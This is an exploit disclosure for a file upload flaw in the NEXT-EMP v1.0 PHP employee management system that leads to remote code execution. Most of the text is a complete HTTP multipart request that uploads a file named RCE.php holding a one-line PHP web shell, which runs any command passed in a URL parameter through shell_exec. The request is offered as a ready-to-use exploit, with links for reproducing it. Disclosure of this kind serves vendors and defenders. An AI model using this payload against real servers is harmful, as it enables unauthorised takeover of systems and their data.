Get Rid of Ads!

Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

# Titles: NEXT-EMP v1.0-Copyright ? 2024. All rights reserved.
### File # Titles: NEXT-EMP v1.0-Copyright ? 2024. All rights reserved.
### File Upload-FU and Remote Code Execution-RCE Vulnerabilities
# Author: nu11secur1ty
# Date: 01/29/2025
# Vendor: https://www.mayurik.com/
# Software:
https://www.mayurik.com/source-code/P8337/complete-employee-management-system-project-in-php-free-download
# Reference: https://portswigger.net/web-security/file-upload |
https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload

## Description:
The website_image parameter in profile app is vulnerable for File Upload
and then Remote Code Execution without any execution permission sanitizing.
The attacker can upload absolutely DANGEROUS files on that server and he
can destroy it with one click!

STATUS: HIGH-CRITICAL Vulnerability


[+]Exploit:
- RCE Exploit:

```RCE
POST /pwnedhost/_hr_soft/admin/profile.php HTTP/1.1
Host: 192.168.100.45
Cookie: PHPSESSID=slraqmcub88jc9mdbc968fop7l
Content-Length: 1325
Cache-Control: max-age=0
Sec-Ch-Ua: "Not A(Brand";v="8", "Chromium";v="132"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Origin: https://192.168.100.45
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryHzTVdFgDMQYGBepP
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://192.168.100.45/pwnedhost/_hr_soft/admin/profile.php
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

------WebKitFormBoundaryHzTVdFgDMQYGBepP
Content-Disposition: form-data; name="old_website_image"

stupid.png
------WebKitFormBoundaryHzTVdFgDMQYGBepP
Content-Disposition: form-data; name="website_image"; filename="RCE.php"
Content-Type: application/octet-stream

<?php echo shell_exec($_GET["cmd"]); ?>

------WebKitFormBoundaryHzTVdFgDMQYGBepP
Content-Disposition: form-data; name="fname"

Mayuri
------WebKitFormBoundaryHzTVdFgDMQYGBepP
Content-Disposition: form-data; name="lname"

K
------WebKitFormBoundaryHzTVdFgDMQYGBepP
Content-Disposition: form-data; name="email"

This email address is being protected from spambots. You need JavaScript enabled to view it.
------WebKitFormBoundaryHzTVdFgDMQYGBepP
Content-Disposition: form-data; name="gender"

Male
------WebKitFormBoundaryHzTVdFgDMQYGBepP
Content-Disposition: form-data; name="contact"

9529230459
------WebKitFormBoundaryHzTVdFgDMQYGBepP
Content-Disposition: form-data; name="username"

mayurik
------WebKitFormBoundaryHzTVdFgDMQYGBepP
Content-Disposition: form-data; name="address"

India


------WebKitFormBoundaryHzTVdFgDMQYGBepP
Content-Disposition: form-data; name="update"


------WebKitFormBoundaryHzTVdFgDMQYGBepP--


```

# Reproduce:
[href](https://www.patreon.com/posts/nextemployee-1-0-121020861)
[more](https://www.nu11secur1ty.com/2025/01/nextemployee-10-rce.html)


## Time spent:
00:37:00